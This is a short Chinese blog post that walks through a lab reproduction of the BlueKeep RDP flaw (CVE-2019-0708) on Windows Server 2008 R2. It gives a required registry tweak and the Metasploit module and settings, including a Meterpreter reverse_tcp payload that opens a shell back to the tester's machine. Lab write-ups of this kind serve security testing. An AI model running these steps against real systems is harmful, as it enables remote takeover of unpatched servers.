516天 JunMo

乾坤未定,你我皆是黑马!

CVE-2019-0708 远程桌面代码执行漏洞Windows Server 2008复现

发布于 1年前 / 214 次围观 / 0 条评论 / 漏洞复现 / JunMo

0x01前言

复现完了win7,在来水一篇复现2008的,虽然比较鸡肋。

0x02环境

这里我使用的是 Microsoft Windows Server 2008 R2 Enterprise 

依旧开启3389关闭防火墙

0x03复现

首先要修改注册表HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp\fDisableCam为 0(好鸡肋啊!!!) 不修改的话我测试都是蓝屏

然后启动msf使用模块(没有配置模块的可以看看我前面的文章)

use exploit/rdp/cve_2019_0708_bluekeep_rce

然后配置参数

set RDP_CLIENT_IP 192.168.0.121 //设置自己的ip

set RHOSTS 192.168.0.116 //设置靶机ip

set target 1//设置1

set payload windows/x64/meterpreter/reverse_tcp //设置payload

set lhost 192.168.0.121 //设置自己的ip


小火车启动嘟嘟嘟

复现成功。

未显示?请点击刷新